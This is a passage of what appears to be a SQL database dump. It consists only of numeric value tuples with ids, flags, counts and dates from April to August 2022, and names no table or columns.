-04-27'),(1157,0,0,1,1137,21,1,'2022-04-27'),(1158,0,0,1,1082,21,1,'2022-04-27'),(1160,0,0,1,1100,21,1,'2022-04-27'),(1162,0,0,1,1122,21,1,'2022-04-27'),(1163,0,0,1,1123,21,1,'2022-04-27'),(1164,9,0,0,85,1,1,'2022-04-27'),(1166,1,0,0,0,21,19,'2022-04-28'),(1167,0,0,1,1089,21,1,'2022-04-28'),(1168,0,0,1,1069,21,1,'2022-04-28'),(1169,0,0,1,1134,21,1,'2022-04-28'),(1170,0,0,1,1095,21,1,'2022-04-28'),(1171,0,0,1,1119,21,1,'2022-04-28'),(1172,9,0,0,35,1,1,'2022-04-28'),(1173,0,0,1,1159,21,1,'2022-04-28'),(1175,0,0,1,1135,21,1,'2022-04-28'),(1176,0,0,1,1163,21,1,'2022-04-28'),(1178,0,0,1,1116,21,1,'2022-04-28'),(1179,0,0,1,1170,21,1,'2022-04-28'),(1182,0,0,1,1086,21,1,'2022-04-28'),(1183,0,0,1,1111,21,1,'2022-04-28'),(1185,0,0,1,1145,21,1,'2022-04-28'),(1187,0,0,1,1092,21,1,'2022-04-28'),(1191,0,0,1,1114,21,1,'2022-04-28'),(1192,9,0,0,36,1,1,'2022-04-28'),(1193,9,0,0,130,1,1,'2022-04-28'),(1196,9,0,0,37,1,1,'2022-04-28'),(1199,0,0,1,1146,21,1,'2022-04-28'),(1200,0,0,1,1084,21,1,'2022-04-28'),(1201,0,0,1,1083,21,1,'2022-04-28'),(1204,0,0,1,1085,21,1,'2022-04-28'),(1205,0,0,1,1117,21,1,'2022-04-28'),(1207,0,0,1,1102,21,1,'2022-04-28'),(1210,0,0,1,1287,21,1,'2022-04-29'),(1211,0,0,1,1289,21,1,'2022-04-29'),(1212,9,0,0,130,1,1,'2022-04-29'),(1213,1,0,0,0,21,1,'2022-04-29'),(1214,1,0,0,0,21,2,'2022-05-01'),(1216,0,0,1,1114,21,1,'2022-05-03'),(1217,0,0,1,1116,21,1,'2022-05-03'),(1218,0,0,1,1097,21,1,'2022-05-03'),(1219,0,0,1,1263,21,1,'2022-05-03'),(1220,0,0,1,1287,21,1,'2022-05-03'),(1221,0,0,1,1288,21,1,'2022-05-03'),(1222,1,0,0,0,21,1,'2022-05-03'),(1223,1,0,0,0,21,1,'2022-05-05'),(1224,0,0,1,1287,21,1,'2022-05-06'),(1225,0,0,1,1126,21,1,'2022-05-06'),(1226,0,0,1,1128,21,1,'2022-05-06'),(1227,0,0,1,1288,21,1,'2022-05-06'),(1228,0,0,1,1137,21,1,'2022-05-06'),(1229,1,0,0,0,21,1,'2022-05-06'),(1230,9,0,0,36,1,1,'2022-05-07'),(1231,1,0,0,0,21,1,'2022-05-07'),(1232,0,0,1,1069,21,1,'2022-05-07'),(1233,1,0,0,0,21,1,'2022-05-08'),(1234,0,0,1,1111,21,1,'2022-05-10'),(1235,0,0,1,1117,21,2,'2022-05-11'),(1237,1,0,0,0,21,2,'2022-05-12'),(1239,0,0,1,1117,21,1,'2022-05-12'),(1240,0,0,1,1128,21,1,'2022-05-13'),(1241,0,0,1,1289,21,1,'2022-05-13'),(1242,0,0,1,1097,21,1,'2022-05-13'),(1243,0,0,1,1165,21,1,'2022-05-13'),(1244,0,0,1,1141,21,1,'2022-05-13'),(1245,0,0,1,1288,21,1,'2022-05-13'),(1246,9,0,0,35,1,1,'2022-05-13'),(1247,0,0,1,1287,21,1,'2022-05-13'),(1248,0,0,1,1159,21,1,'2022-05-13'),(1249,0,0,1,1109,21,1,'2022-05-13'),(1250,0,0,1,1137,21,1,'2022-05-13'),(1251,0,0,1,1126,21,1,'2022-05-13'),(1252,0,0,1,1167,21,1,'2022-05-13'),(1253,9,0,0,130,1,1,'2022-05-13'),(1254,0,0,1,1086,21,1,'2022-05-13'),(1255,9,0,0,37,1,1,'2022-05-13'),(1256,0,0,1,1123,21,1,'2022-05-13'),(1257,0,0,1,1122,21,1,'2022-05-13'),(1258,0,0,1,1111,21,1,'2022-05-13'),(1259,9,0,0,36,1,1,'2022-05-13'),(1260,0,0,1,1116,21,1,'2022-05-13'),(1261,0,0,1,1264,21,1,'2022-05-13'),(1262,0,0,1,1169,21,1,'2022-05-13'),(1263,0,0,1,1114,21,1,'2022-05-13'),(1264,0,0,1,1263,21,1,'2022-05-13'),(1265,9,0,0,129,1,1,'2022-05-13'),(1266,0,0,1,1134,21,1,'2022-05-13'),(1267,9,0,0,77,1,1,'2022-05-13'),(1268,0,0,1,1129,21,1,'2022-05-13'),(1269,0,0,1,1170,21,1,'2022-05-13'),(1270,0,0,1,1119,21,1,'2022-05-13'),(1271,9,0,0,127,1,1,'2022-05-13'),(1272,0,0,1,1120,21,1,'2022-05-13'),(1273,0,0,1,1117,21,1,'2022-05-13'),(1274,1,0,0,0,21,1,'2022-05-15'),(1275,1,0,0,0,21,1,'2022-05-18'),(1276,1,0,0,0,21,2,'2022-05-22'),(1278,0,0,1,1263,21,1,'2022-05-23'),(1279,0,0,1,1159,21,1,'2022-05-23'),(1280,0,0,1,1161,21,2,'2022-05-23'),(1281,0,0,1,1163,21,1,'2022-05-23'),(1282,0,0,1,1289,21,1,'2022-05-23'),(1283,0,0,1,1165,21,1,'2022-05-23'),(1284,0,0,1,1287,21,1,'2022-05-23'),(1285,0,0,1,1169,21,1,'2022-05-23'),(1286,0,0,1,1288,21,1,'2022-05-23'),(1287,0,0,1,1170,21,1,'2022-05-23'),(1288,0,0,1,1109,21,1,'2022-05-23'),(1289,0,0,1,1111,21,1,'2022-05-23'),(1290,0,0,1,1117,21,1,'2022-05-23'),(1291,1,0,0,0,21,1,'2022-05-23'),(1292,0,0,1,1264,21,1,'2022-05-23'),(1293,0,0,1,1114,21,1,'2022-05-23'),(1294,0,0,1,1116,21,1,'2022-05-23'),(1295,0,0,1,1119,21,1,'2022-05-23'),(1296,0,0,1,1120,21,1,'2022-05-23'),(1297,9,0,0,77,1,1,'2022-05-23'),(1298,0,0,1,1122,21,1,'2022-05-23'),(1299,9,0,0,38,1,1,'2022-05-23'),(1300,0,0,1,1125,21,1,'2022-05-23'),(1301,9,0,0,37,1,1,'2022-05-23'),(1302,0,0,1,1126,21,1,'2022-05-23'),(1303,9,0,0,36,1,1,'2022-05-23'),(1304,0,0,1,1128,21,1,'2022-05-23'),(1305,9,0,0,35,1,1,'2022-05-23'),(1306,0,0,1,1129,21,1,'2022-05-23'),(1308,0,0,1,1161,21,1,'2022-05-24'),(1309,1,0,0,0,21,1,'2022-05-25'),(1310,1,0,0,0,21,1,'2022-05-28'),(1311,0,0,1,1287,21,1,'2022-05-28'),(1312,0,0,1,1289,21,1,'2022-05-28'),(1313,9,0,0,130,1,1,'2022-05-28'),(1314,1,0,0,0,21,1,'2022-05-31'),(1315,9,0,0,36,1,1,'2022-06-01'),(1316,0,0,1,1097,21,1,'2022-06-01'),(1317,0,0,1,1093,21,1,'2022-06-01'),(1318,0,0,1,1082,21,1,'2022-06-01'),(1319,9,0,0,127,1,1,'2022-06-02'),(1320,9,0,0,128,1,1,'2022-06-02'),(1321,9,0,0,129,1,1,'2022-06-02'),(1322,9,0,0,130,1,1,'2022-06-02'),(1323,9,0,0,35,1,1,'2022-06-02'),(1324,9,0,0,77,1,1,'2022-06-02'),(1325,9,0,0,38,1,1,'2022-06-02'),(1326,9,0,0,37,1,1,'2022-06-02'),(1327,9,0,0,36,1,1,'2022-06-02'),(1328,1,0,0,0,21,1,'2022-06-04'),(1329,0,0,1,1069,21,1,'2022-06-04'),(1330,1,0,0,0,21,1,'2022-06-06'),(1331,9,0,0,130,1,1,'2022-06-10'),(1332,9,0,0,35,1,1,'2022-06-10'),(1333,9,0,0,36,1,1,'2022-06-10'),(1334,9,0,0,37,1,1,'2022-06-10'),(1335,9,0,0,38,1,1,'2022-06-10'),(1336,9,0,0,77,1,1,'2022-06-10'),(1337,0,0,1,1289,21,1,'2022-06-10'),(1338,0,0,1,1288,21,1,'2022-06-10'),(1339,0,0,1,1287,21,1,'2022-06-10'),(1340,0,0,1,1111,21,1,'2022-06-12'),(1341,0,0,1,1129,21,1,'2022-06-13'),(1342,0,0,1,1137,21,1,'2022-06-14'),(1343,9,0,0,129,1,1,'2022-06-14'),(1344,9,0,0,130,1,3,'2022-06-15'),(1345,9,0,0,35,1,6,'2022-06-15'),(1346,9,0,0,36,1,1,'2022-06-15'),(1347,9,0,0,77,1,1,'2022-06-15'),(1348,0,0,1,1263,21,2,'2022-06-15'),(1349,0,0,1,1097,21,3,'2022-06-15'),(1350,0,0,1,1264,21,1,'2022-06-15'),(1351,0,0,1,1159,21,1,'2022-06-15'),(1352,0,0,1,1161,21,1,'2022-06-15'),(1353,0,0,1,1163,21,1,'2022-06-15'),(1354,0,0,1,1165,21,1,'2022-06-15'),(1355,0,0,1,1169,21,1,'2022-06-15'),(1356,0,0,1,1170,21,1,'2022-06-15'),(1357,0,0,1,1117,21,1,'2022-06-15'),(1358,0,0,1,1122,21,1,'2022-06-15'),(1359,0,0,1,1125,21,1,'2022-06-15'),(1360,0,0,1,1128,21,1,'2022-06-15'),(1361,0,0,1,1129,21,1,'2022-06-15'),(1362,0,0,1,1131,21,1,'2022-06-15'),(1363,0,0,1,1132,21,1,'2022-06-15'),(1364,0,0,1,1134,21,1,'2022-06-15'),(1365,0,0,1,1135,21,1,'2022-06-15'),(1366,0,0,1,1138,21,1,'2022-06-15'),(1367,9,0,0,85,1,1,'2022-06-15'),(1368,0,0,1,1084,21,1,'2022-06-15'),(1369,9,0,0,128,1,1,'2022-06-15'),(1370,9,0,0,129,1,1,'2022-06-15'),(1373,0,0,1,1146,21,1,'2022-06-15'),(1374,0,0,1,1083,21,1,'2022-06-15'),(1375,0,0,1,1143,21,1,'2022-06-15'),(1376,0,0,1,1088,21,1,'2022-06-15'),(1377,0,0,1,1089,21,1,'2022-06-15'),(1380,0,0,1,1082,21,1,'2022-06-15'),(1381,0,0,1,1092,21,1,'2022-06-15'),(1382,0,0,1,1093,21,1,'2022-06-15'),(1383,0,0,1,1100,21,1,'2022-06-15'),(1384,0,0,1,1107,21,1,'2022-06-15'),(1388,0,0,1,1091,21,1,'2022-06-15'),(1389,0,0,1,1141,21,1,'2022-06-15'),(1390,0,0,1,1086,21,1,'2022-06-15'),(1391,0,0,1,1102,21,1,'2022-06-15'),(1395,1,0,0,0,21,1,'2022-06-16'),(1396,9,0,0,130,1,1,'2022-06-16'),(1397,0,0,1,1169,21,1,'2022-06-16'),(1398,0,0,1,1134,21,1,'2022-06-17'),(1399,0,0,1,1128,21,1,'2022-06-17'),(1400,0,0,1,1114,21,1,'2022-06-17'),(1401,0,0,1,1097,21,1,'2022-06-18'),(1402,0,0,1,1263,21,1,'2022-06-18'),(1403,0,0,1,1159,21,1,'2022-06-18'),(1404,0,0,1,1161,21,1,'2022-06-18'),(1405,0,0,1,1287,21,1,'2022-06-18'),(1406,0,0,1,1163,21,1,'2022-06-18'),(1407,0,0,1,1288,21,2,'2022-06-18'),(1408,0,0,1,1165,21,1,'2022-06-18'),(1409,0,0,1,1289,21,1,'2022-06-18'),(1410,0,0,1,1167,21,1,'2022-06-18'),(1411,0,0,1,1169,21,1,'2022-06-18'),(1412,0,0,1,1170,21,1,'2022-06-18'),(1413,0,0,1,1109,21,1,'2022-06-18'),(1414,0,0,1,1111,21,1,'2022-06-18'),(1415,0,0,1,1117,21,1,'2022-06-18'),(1416,1,0,0,0,21,3,'2022-06-18'),(1417,0,0,1,1264,21,2,'2022-06-18'),(1418,0,0,1,1114,21,1,'2022-06-18'),(1419,0,0,1,1116,21,1,'2022-06-18'),(1420,9,0,0,77,1,1,'2022-06-18'),(1421,0,0,1,1119,21,1,'2022-06-18'),(1422,9,0,0,38,1,1,'2022-06-18'),(1423,0,0,1,1120,21,1,'2022-06-18'),(1424,9,0,0,37,1,1,'2022-06-18'),(1425,0,0,1,1122,21,1,'2022-06-18'),(1426,9,0,0,36,1,1,'2022-06-18'),(1427,0,0,1,1123,21,1,'2022-06-18'),(1428,9,0,0,35,1,1,'2022-06-18'),(1429,0,0,1,1126,21,1,'2022-06-18'),(1430,9,0,0,130,1,1,'2022-06-18'),(1431,0,0,1,1128,21,1,'2022-06-18'),(1432,0,0,1,1129,21,1,'2022-06-18'),(1433,0,0,1,1131,21,1,'2022-06-18'),(1434,0,0,1,1132,21,1,'2022-06-18'),(1435,0,0,1,1134,21,1,'2022-06-18'),(1436,0,0,1,1135,21,1,'2022-06-18'),(1437,0,0,1,1137,21,1,'2022-06-18'),(1438,9,0,0,129,1,1,'2022-06-18'),(1439,0,0,1,1138,21,1,'2022-06-18'),(1440,9,0,0,128,1,1,'2022-06-18'),(1441,9,0,0,127,1,1,'2022-06-18'),(1442,0,0,1,1084,21,1,'2022-06-18'),(1443,9,0,0,85,1,1,'2022-06-18'),(1444,0,0,1,1125,21,2,'2022-06-18'),(1445,0,0,1,1100,21,1,'2022-06-18'),(1446,0,0,1,1141,21,1,'2022-06-18'),(1452,9,0,0,35,1,1,'2022-06-19'),(1453,0,0,1,1084,21,1,'2022-06-20'),(1454,1,0,0,0,21,3,'2022-06-20'),(1456,9,0,0,128,1,1,'2022-06-20'),(1457,9,0,0,127,1,1,'2022-06-20'),(1458,0,0,1,1069,21,1,'2022-06-20'),(1459,9,0,0,129,1,1,'2022-06-20'),(1460,0,0,1,1263,21,1,'2022-06-20'),(1461,9,0,0,85,1,1,'2022-06-20'),(1462,9,0,0,35,1,1,'2022-06-20'),(1463,0,0,1,1264,21,1,'2022-06-20'),(1464,0,0,1,1125,21,1,'2022-06-20'),(1465,0,0,1,1093,21,2,'2022-06-20'),(1466,0,0,1,1137,21,1,'2022-06-20'),(1467,0,0,1,1131,21,1,'2022-06-20'),(1468,0,0,1,1135,21,1,'2022-06-20'),(1469,9,0,0,36,1,1,'2022-06-20'),(1470,0,0,1,1120,21,1,'2022-06-20'),(1471,9,0,0,77,1,1,'2022-06-20'),(1472,9,0,0,37,1,1,'2022-06-20'),(1473,9,0,0,130,1,1,'2022-06-20'),(1474,0,0,1,1288,21,1,'2022-06-20'),(1475,0,0,1,1287,21,1,'2022-06-20'),(1476,0,0,1,1289,21,1,'2022-06-20'),(1477,9,0,0,38,1,1,'2022-06-20'),(1478,0,0,1,1163,21,1,'2022-06-20'),(1479,0,0,1,1145,21,1,'2022-06-20'),(1480,0,0,1,1083,21,1,'2022-06-20'),(1481,0,0,1,1095,21,1,'2022-06-20'),(1482,0,0,1,1100,21,1,'2022-06-20'),(1483,0,0,1,1091,21,1,'2022-06-20'),(1484,0,0,1,1086,21,1,'2022-06-20'),(1487,0,0,1,1109,21,1,'2022-06-21'),(1488,0,0,1,1132,21,1,'2022-06-23'),(1489,0,0,1,1114,21,1,'2022-06-23'),(1490,0,0,1,1116,21,1,'2022-06-23'),(1491,0,0,1,1097,21,1,'2022-06-23'),(1492,0,0,1,1263,21,1,'2022-06-23'),(1493,0,0,1,1287,21,1,'2022-06-23'),(1494,0,0,1,1288,21,1,'2022-06-23'),(1495,0,0,1,1138,21,1,'2022-06-26'),(1496,0,0,1,1289,21,1,'2022-06-27'),(1497,0,0,1,1165,21,1,'2022-06-27'),(1498,0,0,1,1287,21,1,'2022-06-30'),(1499,0,0,1,1289,21,1,'2022-06-30'),(1500,9,0,0,130,1,1,'2022-06-30'),(1501,0,0,1,1116,21,1,'2022-06-30'),(1502,0,0,1,1093,21,1,'2022-07-01'),(1503,0,0,1,1288,21,1,'2022-07-01'),(1504,0,0,1,1263,21,1,'2022-07-01'),(1505,0,0,1,1100,21,1,'2022-07-01'),(1506,0,0,1,1287,21,1,'2022-07-01'),(1507,0,0,1,1289,21,1,'2022-07-02'),(1508,0,0,1,1264,21,1,'2022-07-02'),(1509,0,0,1,1084,21,1,'2022-07-02'),(1510,0,0,1,1131,21,1,'2022-07-02'),(1511,0,0,1,1137,21,1,'2022-07-02'),(1512,0,0,1,1132,21,1,'2022-07-04'),(1513,0,0,1,1122,21,1,'2022-07-05'),(1514,0,0,1,1093,21,1,'2022-07-05'),(1515,1,0,0,0,21,1,'2022-07-06'),(1516,0,0,1,1069,21,1,'2022-07-06'),(1517,9,0,0,38,1,1,'2022-07-06'),(1518,9,0,0,130,1,1,'2022-07-06'),(1519,0,0,1,1287,21,1,'2022-07-06'),(1520,0,0,1,1093,21,1,'2022-07-06'),(1521,0,0,1,1161,21,1,'2022-07-06'),(1522,1,0,0,0,21,1,'2022-07-07'),(1523,1,0,0,0,21,2,'2022-07-08'),(1524,9,0,0,35,1,1,'2022-07-08'),(1525,9,0,0,36,1,1,'2022-07-08'),(1526,9,0,0,77,1,1,'2022-07-08'),(1527,9,0,0,130,1,1,'2022-07-08'),(1528,9,0,0,37,1,1,'2022-07-08'),(1529,9,0,0,38,1,1,'2022-07-08'),(1531,0,0,1,1114,21,1,'2022-07-10'),(1532,0,0,1,1116,21,1,'2022-07-10'),(1533,0,0,1,1097,21,1,'2022-07-10'),(1534,0,0,1,1263,21,1,'2022-07-10'),(1535,0,0,1,1287,21,1,'2022-07-10'),(1536,0,0,1,1288,21,2,'2022-07-10'),(1537,0,0,1,1289,21,1,'2022-07-10'),(1539,9,0,0,130,1,1,'2022-07-11'),(1540,9,0,0,35,1,1,'2022-07-11'),(1541,9,0,0,36,1,1,'2022-07-11'),(1542,9,0,0,37,1,1,'2022-07-11'),(1543,9,0,0,38,1,1,'2022-07-11'),(1544,9,0,0,77,1,1,'2022-07-11'),(1545,0,0,1,1289,21,1,'2022-07-11'),(1546,0,0,1,1288,21,1,'2022-07-11'),(1547,0,0,1,1287,21,1,'2022-07-11'),(1548,9,0,0,77,1,1,'2022-07-12'),(1549,1,0,0,0,21,1,'2022-07-12'),(1550,0,0,1,1097,21,1,'2022-07-13'),(1551,0,0,1,1263,21,1,'2022-07-13'),(1552,0,0,1,1159,21,1,'2022-07-13'),(1553,0,0,1,1161,21,1,'2022-07-13'),(1554,0,0,1,1287,21,1,'2022-07-13'),(1555,0,0,1,1163,21,1,'2022-07-13'),(1556,0,0,1,1288,21,1,'2022-07-13'),(1557,0,0,1,1165,21,1,'2022-07-13'),(1558,0,0,1,1289,21,1,'2022-07-13'),(1559,0,0,1,1167,21,1,'2022-07-13'),(1560,0,0,1,1165,21,1,'2022-07-14'),(1561,9,0,0,85,1,1,'2022-07-15'),(1562,0,0,1,1144,21,1,'2022-07-15'),(1563,0,0,1,1167,21,1,'2022-07-15'),(1564,0,0,1,1169,21,1,'2022-07-18'),(1565,0,0,1,1263,21,1,'2022-07-18'),(1566,9,0,0,36,1,1,'2022-07-18'),(1567,0,0,1,1159,21,1,'2022-07-18'),(1568,0,0,1,1125,21,1,'2022-07-18'),(1569,0,0,1,1111,21,1,'2022-07-18'),(1570,0,0,1,1138,21,1,'2022-07-18'),(1571,0,0,1,1167,21,1,'2022-07-18'),(1572,0,0,1,1289,21,1,'2022-07-18'),(1573,0,0,1,1287,21,1,'2022-07-18'),(1574,0,0,1,1119,21,1,'2022-07-18'),(1575,0,0,1,1120,21,1,'2022-07-18'),(1576,9,0,0,35,1,1,'2022-07-18'),(1577,0,0,1,1069,21,1,'2022-07-18'),(1578,0,0,1,1288,21,1,'2022-07-18'),(1579,0,0,1,1135,21,1,'2022-07-18'),(1580,0,0,1,1093,21,1,'2022-07-18'),(1581,0,0,1,1097,21,1,'2022-07-18'),(1582,0,0,1,1134,21,1,'2022-07-18'),(1583,9,0,0,38,1,1,'2022-07-18'),(1584,0,0,1,1131,21,1,'2022-07-18'),(1585,0,0,1,1161,21,1,'2022-07-18'),(1586,0,0,1,1128,21,1,'2022-07-19'),(1587,9,0,0,129,1,1,'2022-07-19'),(1588,1,0,0,0,21,1,'2022-07-20'),(1589,0,0,1,1159,21,1,'2022-07-20'),(1590,0,0,1,1091,21,1,'2022-07-22'),(1591,0,0,1,1131,21,1,'2022-07-27'),(1592,0,0,1,1287,21,1,'2022-07-28'),(1593,0,0,1,1289,21,2,'2022-07-28'),(1594,9,0,0,130,1,2,'2022-07-28'),(1595,0,0,1,1170,21,1,'2022-07-28'),(1596,0,0,1,1122,21,1,'2022-07-28'),(1597,9,0,0,128,1,1,'2022-07-28'),(1598,0,0,1,1109,21,1,'2022-07-28'),(1599,0,0,1,1264,21,1,'2022-07-28'),(1600,0,0,1,1123,21,1,'2022-07-28'),(1601,1,0,0,0,21,23,'2022-07-28'),(1602,9,0,0,85,1,1,'2022-07-28'),(1603,0,0,1,1137,21,1,'2022-07-28'),(1604,9,0,0,36,1,1,'2022-07-28'),(1605,0,0,1,1120,21,1,'2022-07-28'),(1606,0,0,1,1117,21,1,'2022-07-28'),(1607,0,0,1,1138,21,1,'2022-07-28'),(1608,0,0,1,1132,21,1,'2022-07-28'),(1609,0,0,1,1125,21,1,'2022-07-28'),(1610,0,0,1,1126,21,1,'2022-07-28'),(1611,0,0,1,1111,21,1,'2022-07-28'),(1612,0,0,1,1159,21,1,'2022-07-28'),(1613,0,0,1,1128,21,1,'2022-07-28'),(1614,0,0,1,1129,21,1,'2022-07-28'),(1615,0,0,1,1167,21,1,'2022-07-28'),(1616,0,0,1,1161,21,1,'2022-07-28'),(1617,9,0,0,77,1,1,'2022-07-28'),(1619,0,0,1,1119,21,1,'2022-07-28'),(1620,9,0,0,38,1,1,'2022-07-28'),(1621,0,0,1,1131,21,2,'2022-07-28'),(1623,9,0,0,35,1,4,'2022-07-28'),(1624,0,0,1,1114,21,1,'2022-07-28'),(1625,0,0,1,1091,21,1,'2022-07-28'),(1626,0,0,1,1102,21,1,'2022-07-28'),(1627,0,0,1,1116,21,1,'2022-07-28'),(1628,0,0,1,1169,21,1,'2022-07-28'),(1629,0,0,1,1163,21,1,'2022-07-28'),(1630,9,0,0,127,1,1,'2022-07-28'),(1631,9,0,0,129,1,1,'2022-07-28'),(1632,0,0,1,1288,21,1,'2022-07-28'),(1633,9,0,0,37,1,1,'2022-07-28'),(1634,0,0,1,1134,21,1,'2022-07-28'),(1635,0,0,1,1263,21,1,'2022-07-28'),(1636,0,0,1,1135,21,1,'2022-07-28'),(1637,0,0,1,1145,21,1,'2022-07-28'),(1639,0,0,1,1082,21,1,'2022-07-28'),(1641,0,0,1,1086,21,1,'2022-07-28'),(1642,0,0,1,1087,21,1,'2022-07-28'),(1643,0,0,1,1088,21,1,'2022-07-28'),(1644,0,0,1,1089,21,1,'2022-07-28'),(1646,0,0,1,1165,21,1,'2022-07-28'),(1647,0,0,1,1092,21,1,'2022-07-28'),(1648,0,0,1,1069,21,1,'2022-07-28'),(1649,0,0,1,1083,21,1,'2022-07-28'),(1650,0,0,1,1100,21,1,'2022-07-28'),(1651,0,0,1,1146,21,1,'2022-07-28'),(1652,0,0,1,1084,21,1,'2022-07-28'),(1653,0,0,1,1141,21,1,'2022-07-28'),(1654,0,0,1,1095,21,1,'2022-07-28'),(1656,0,0,1,1140,21,1,'2022-07-28'),(1659,0,0,1,1107,21,1,'2022-07-28'),(1660,0,0,1,1144,21,1,'2022-07-28'),(1661,0,0,1,1143,21,1,'2022-07-28'),(1662,0,0,1,1085,21,1,'2022-07-28'),(1663,0,0,1,1093,21,1,'2022-07-28'),(1684,0,0,1,1117,21,1,'2022-07-29'),(1685,0,0,1,1264,21,1,'2022-07-30'),(1686,0,0,1,1131,21,1,'2022-07-30'),(1687,1,0,0,0,21,1,'2022-07-31'),(1688,0,0,1,1135,21,1,'2022-07-31'),(1689,0,0,1,1117,21,1,'2022-07-31'),(1690,9,0,0,129,1,1,'2022-07-31'),(1691,9,0,0,85,1,1,'2022-07-31'),(1692,0,0,1,1137,21,1,'2022-08-01'),(1693,9,0,0,127,1,1,'2022-08-01'),(1694,9,0,0,128,1,1,'2022-08-01'),(1695,9,0,0,129,1,1,'2022-08-01'),(1696,9,0,0,130,1,1,'2022-08-01'),(1697,9,0,0,38,1,1,'2022-08-01'),(1698,9,0,0,77,1,1,'2022-08-01'),(1699,9,0,0,35,1,2,'2022-08-01'),(1700,9,0,0,37,1,1,'2022-08-01'),(1701,0,0,1,1263,21,2,'2022-08-01'),(1702,0,0,1,1131,21,2,'2022-08-01'),(1704,9,0,0,36,1,1,'2022-08-01'),(1707,1,0,0,0,21,1,'2022-08-01'),(1708,0,0,1,1287,21,1,'2022-08-02'),(1709,0,0,1,1264,21,1,'2022-08-02'),(1710,0,0,1,1084,21,1,'2022-08-03'),(1711,0,0,1,1125,21,1,'2022-08-03'),(1712,0,0,1,1135,21,1,'2022-08-03'),(1713,0,0,1,1163,21,1,'2022-08-03'),(1714,0,0,1,1137,21,1,'2022-08-05'),(1715,0,0,1,1264,21,1,'2022-08-05'),(1716,0,0,1,1135,21,1,'2022-08-05'),(1717,0,0,1,1287,21,1,'2022-08-05'),(1718,0,0,1,1137,21,2,'2022-08-06'),(1719,0,0,1,1287,21,2,'2022-08-06'),(1720,0,0,1,1131,21,2,'2022-08-06'),(1721,0,0,1,1263,21,2,'2022-08-06'),(1722,0,0,1,1125,21,1,'2022-08-06'),(1727,0,0,1,1085,21,1,'2022-08-06'),(1728,0,0,1,1125,21,2,'2022-08-07'),(1730,0,0,1,1084,21,1,'2022-08-07'),(1731,0,0,1,1097,21,1,'2022-08-08'),(1732,0,0,1,1263,21,1,'2022-08-08'),(1733,0,0,1,1159,21,1,'2022-08-08'),(1734,0,0,1,1161,21,1,'2022-08-08'),(1735,0,0,1,1287,21,1,'2022-08-08'),(1736,0,0,1,1163,21,1,'2022-08-08'),(1737,0,0,1,1288,21,1,'2022-08-08'),(1738,0,0,1,1165,21,1,'2022-08-08'),(1739,0,0,1,1289,21,1,'2022-08-08'),(1740,0,0,1,1167,21,1,'2022-08-08'),(1741,0,0,1,1169,21,1,'2022-08-08'),(1742,0,0,1,1170,21,1,'2022-08-08'),(1743,0,0,1,1109,21,1,'2022-08-08'),(1744,0,0,1,1111,21,1,'2022-08-08'),(1745,0,0,1,1117,21,1,'2022-08-08'),(1746,1,0,0,0,21,2,'2022-08-08'),(1747,0,0,1,1264,21,1,'2022-08-08'),(1748,0,0,1,1114,21,1,'2022-08-08'),(1749,0,0,1,1116,21,1,'2022-08-08'),(1750,9,0,0,77,1,1,'2022-08-08'),(1751,0,0,1,1119,21,1,'2022-08-08'),(1752,9,0,0,38,1,1,'2022-08-08'),(1753,0,0,1,1120,21,1,'2022-08-08'),(1754,9,0,0,37,1,2,'2022-08-08'),(1755,0,0,1,1122,21,1,'2022-08-08'),(1756,9,0,0,36,1,2,'2022-08-08'),(1757,0,0,1,1123,21,1,'2022-08-08'),(1758,9,0,0,35,1,1,'2022-08-08'),(1759,0,0,1,1126,21,1,'2022-08-08'),(1760,9,0,0,130,1,1,'2022-08-08'),(1761,0,0,1,1128,21,1,'2022-08-08'),(1762,9,0,0,128,1,1,'2022-08-08'),(1764,0,0,1,1084,21,1,'2022-08-08'),(1767,1,0,0,0,21,1,'2022-08-09'),(1768,0,0,1,1069,21,1,'2022-08-09'),(1769,0,0,1,1287,21,1,'2022-08-10'),(1770,0,0,1,1131,21,1,'2022-08-10'),(1771,0,0,1,1264,21,1,'2022-08-11'),(1772,9,0,0,130,1,1,'2022-08-11'),(1773,9,0,0,35,1,1,'2022-08-11'),(1774,9,0,0,36,1,1,'2022-08-11'),(1775,9,0,0,37,1,1,'2022-08-11'),(1776,9,0,0,38,1,1,'2022-08-11'),(1777,9,0,0,77,1,1,'2022-08-11'),(1778,0,0,1,1288,21,1,'2022-08-11'),(1779,0,0,1,1287,21,1,'2022-08-11'),(1780,0,0,1,1289,21,1,'2022-08-11'),(1781,0,0,1,1263,21,1,'2022-08-12'),(1782,0,0,1,1134,21,1,'2022-08-13'),(1783,0,0,1,1159,21,1,'2022-08-13'),(1784,0,0,1,1117,21,1,'2022-08-13'),(1785,0,0,1,1165,21,1,'2022-08-13'),(1786,1,0,0,0,21,3,'2022-08-13'),(1789,9,0,0,127,1,3,'2022-08-14'),(1790,9,0,0,128,1,2,'2022-08-14'),(1791,9,0,0,129,1,2,'2022-08-14'),(1792,0,0,1,1069,21,2,'2022-08-14'),(1793,9,0,0,85,1,2,'2022-08-14'),(1794,0,0,1,1125,21,2,'2022-08-14'),(1795,0,0,1,1126,21,2,'2022-08-14'),(1796,9,0,0,35,1,2,'2022-08-14'),(1797,9,0,0,36,1,2,'2022-08-14'),(1798,0,0,1,1264,21,2,'2022-08-14'),(1799,0,0,1,1122,21,2,'2022-08-14'),(1800,0,0,1,1123,21,2,'2022-08-14'),(1801,0,0,1,1137,21,3,'2022-08-14'),(1802,0,0,1,1138,21,2,'2022-08-14'),(1803,0,0,1,1093,21,2,'2022-08-14'),(1804,0,0,1,1131,21,2,'2022-08-14'),(1805,0,0,1,1132,21,2,'2022-08-14'),(1806,0,0,1,1128,21,2,'2022-08-14'),(1807,0,0,1,1129,21,2,'2022-08-14'),(1808,0,0,1,1119,21,2,'2022-08-14'),(1809,0,0,1,1134,21,2,'2022-08-14'),(1810,0,0,1,1135,21,2,'2022-08-14'),(1811,0,0,1,1120,21,2,'2022-08-14'),(1812,9,0,0,77,1,2,'2022-08-14'),(1813,0,0,1,1114,21,2,'2022-08-14'),(1814,0,0,1,1116,21,2,'2022-08-14'),(1815,9,0,0,37,1,2,'2022-08-14'),(1816,9,0,0,130,1,2,'2022-08-14'),(1817,9,0,0,38,1,2,'2022-08-14'),(1818,0,0,1,1287,21,2,'2022-08-14'),(1819,0,0,1,1288,21,2,'2022-08-14'),(1820,0,0,1,1289,21,2,'2022-08-14'),(1821,0,0,1,1163,21,2,'2022-08-14'),(1856,1,0,0,0,21,1,'2022-08-14'),(1858,0,0,1,1264,21,1,'2022-08-15'),(1859,0,0,1,1135,21,1,'2022-08-15'),(1860,0,0,1,1287,21,2,'2022-08-15'),(1861,0,0,1,1131,21,1,'2022-08-15'),